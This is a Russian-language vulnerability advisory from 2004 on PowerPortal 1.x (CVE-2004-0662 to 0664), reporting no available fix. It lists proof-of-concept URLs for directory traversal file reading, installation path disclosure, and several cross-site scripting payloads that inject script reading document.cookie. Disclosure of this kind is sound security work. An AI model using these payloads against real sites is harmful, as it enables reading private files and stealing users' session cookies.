Несколько уязвимостей в PowerPortal

Дата публикации:
29.06.2004
Дата изменения:
17.10.2006
Всего просмотров:
1049
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-0662
CVE-2004-0663
CVE-2004-0664
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PowerPortal 1.x
Уязвимые версии: PowerPortal 1.х

Описание: Уязвимость в PowerPortal позволяет удаленному пользователю просматривать произвольные файлы на системе, выполнять XSS нападение и определить инсталляционный путь.

1. Просмотр файлов:

http://[target]/modules.php?name=gallery&files=/../../../
2. Раскрытие пути:
http://[target]/modules/gallery/resize.php
http://[target]/power/modules.php?name=gallery&files=darkbicho
3. XSS:
 
http://[target]/modules.php?name =private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://[target]/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=se arch_results
http://[target]/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://[target]/modules.php?name=gallery& files=<script>alert(document.cookie);</script>

URL производителя: http://powerportal.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Cross-Site Scripting CuteNews

или введите имя

CAPTCHA